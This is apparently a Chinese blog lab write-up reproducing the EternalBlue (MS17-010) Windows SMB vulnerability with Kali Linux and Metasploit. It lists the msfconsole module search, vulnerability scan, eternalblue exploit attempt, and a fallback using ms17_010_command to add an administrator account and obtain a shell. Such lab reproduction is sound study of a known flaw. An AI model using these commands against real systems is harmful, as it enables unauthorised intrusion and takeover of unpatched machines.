永恒之蓝

前言——
需要一台有ms17010 和一台kali 
ps:需要在同一局域网内,可以相互ping通
 
漏洞简介:
   永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
 
复现过程:
 
1,在kali下,如果不是root权限,需要提权,如果是,跳过这一步
命令:sudo su
          sudo -i                   这两个都可以
 
2, 启动msf:msfconsole
ps:输入命令后的图像随机,不必纠结这一点
 
3,搜索模块: search ms17_010
ps:关于以上模块,简单解释一下
0 auxiliary/admin/smb/ms17_010_command      //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务
1 auxiliary/scanner/smb/smb_ms17_010   //扫描模块,扫描目标主机是否存在永恒之蓝漏洞
2 exploit/windows/smb/ms17_010_eternalblue    //攻击模块
3 exploit/windows/smb/ms17_010_eternalblue_win8   //攻击模块,针对win8(个人猜测)
4 exploit/windows/smb/ms17_010_psexec     //可以理解成没得用
 
4,建立监听器:use exploit/multi/handler
 
5,使用扫描模块:use auxiliary/scanner/smb/smb_ms17_010
ps:也可以使用前面的序号,这里为了偷懒,就使用前面的序号了:use 1
show options   //查看
ps:required中显示yes的需要补充完整
所以使用命令补充ip地址:set RHOSTS 192.168.3.135(目标ip)
 
6,exploit  //扫描是否有漏洞
ps:run也可以(这里就不展示了,但是建议用exploit)
扫描查看是否存在永恒之蓝这个漏洞,当然这里这里肯定是有的(没有的话就可以换方法了)
 
7,使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue(use 2)
查看模块(show options)
设置ip(set RHOSTS 192.168.3.135)
 
8,尝试攻击:exploit
人类的悲欢并不相同,永恒蓝屏(反正我用这个是没有成功的,本来还想要测试一下有杀软的情况,但是现实不允许啊)
 
另:如果成功,之后的步骤及一些命令
如果成功,会现实win
蓝屏....
 
9,在刚刚exploit命令无法成功后,使用模块:use auxiliary/admin/smb/ms17_010_command (use 0)
一样的步骤,查看,设置(注意:yes的都要添加,不要漏掉)
 
10,exploit运行成功后,可以看到用户已经加进去了
 
11,加入后可以通过远程连接,拿到shell
 
ps:存在问题:不允许交互式登录
更改权限:set COMMAND net localgroup administrators hhh /add
成功添加用户
成功上线
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
posted @   幸运盒子  阅读(1177)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
阅读排行:
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!
点击右上角即可分享
微信分享提示